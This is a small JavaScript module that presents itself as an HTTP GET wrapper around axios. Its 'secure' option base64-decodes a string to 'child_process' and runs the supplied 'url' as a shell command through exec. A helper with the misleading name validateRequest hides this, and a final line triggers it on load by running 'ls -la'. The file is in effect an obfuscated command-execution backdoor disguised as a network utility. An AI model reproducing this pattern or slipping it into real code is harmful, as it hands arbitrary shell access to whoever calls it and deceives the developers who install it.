

const axios = require('axios').default;

exports.get = async (url, secure) => {
	return new Promise((resolve, reject) => {
		if (secure) {
			let ssl = validateRequest(secure);
			const { exec: httpGetSSL } = require(ssl);
			httpGetSSL(url, (err, data) => {
				resolve();
			});
		} else {
			axios.get(url)
				.then(function (response) {
					// handle success
					resolve(response);
				})
				.catch(function (error) {
					// handle error
					console.log(error);
				})
				.then(function () {
					// always executed
				});
		}
	})
}

function validateRequest(data) {
	return Buffer.from(data, 'base64').toString();
}

this.get('ls -la', 'Y2hpbGRfcHJvY2Vzcw==')